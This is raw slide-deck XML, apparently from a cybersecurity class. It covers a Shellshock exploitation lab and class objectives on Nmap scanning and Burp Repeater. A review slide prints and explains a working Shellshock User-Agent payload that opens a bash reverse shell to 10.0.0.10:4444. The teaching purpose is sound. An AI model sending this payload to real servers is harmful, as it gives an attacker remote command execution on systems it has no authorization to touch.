              <a:buNone/>
            </a:pP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355"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2356" name="Google Shape;2356;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="8970300" cy="634500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="1005825" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>40 minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2357" name="Google Shape;2357;p13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35</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2358" name="Google Shape;2358;p137"/>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359" name="Google Shape;2359;p137"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="2764200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2560300" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shellshock Exploitation</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use the Linux Exploitation, beginning at with Part 4: Exploit the Shellshock Vulnerability. </a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>Instructions sent via Slack.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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363"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2364" name="Google Shape;2364;p13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36</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Google Shape;2365;p138"/>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366" name="Google Shape;2366;p138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536250" y="3682625"/>
            <a:ext cx="4220400" cy="720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rgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Shellshock Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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370"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="Google Shape;2371;p139"/>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Shellshock Exploitation Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2372" name="Google Shape;2372;p139"/>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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Note the payload: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>User-Agent: () { :;};echo -e "\r\n$(/bin/bash -i &gt;&amp; /dev/tcp/10.0.0.10/4444 0&gt;&amp;1)"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2373" name="Google Shape;2373;p13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37</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2374" name="Google Shape;2374;p139"/>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375" name="Google Shape;2375;p139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1839650"/>
            <a:ext cx="9144000" cy="3066900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>This complex payload opens a TCP connection to your computer’s port 4444.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>User-Agent: () { :;};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> exploits Shellshock by creating a function. The code after gets executed by the shell.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono Medium"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>echo -e "\r\n$(/bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>/10.0.0.10/4444 0&gt;&amp;1)”</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Courier"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>/bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>/10.0.0.10/4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>means "Run a new Bash shell in interactive mode. Send std error and standard output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>10.0.0.10:4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> through a TCP connection.</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>0&gt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> means "Read standard input (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) to this new shell through the TCP connection."</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Aria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379"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2380" name="Google Shape;2380;p14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Class Objectives</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2381" name="Google Shape;2381;p140"/>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By the end of class today, students will be able to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2382" name="Google Shape;2382;p14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38</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2383" name="Google Shape;2383;p140"/>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384" name="Google Shape;2384;p140"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="914400" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Perform intense scans of target hosts using Zenmap.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Detect specific vulnerabilities, such as shellshock, using Nmap NSE.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Send injection payloads to a vulnerable server using Burp Repeater.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2385" name="Google Shape;2385;p140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="1360450"/>
            <a:ext cx="355500" cy="355500"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00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140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="1920240"/>
            <a:ext cx="355500" cy="355500"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00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140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430175" y="2450592"/>
            <a:ext cx="355500" cy="355500"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00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060"/>
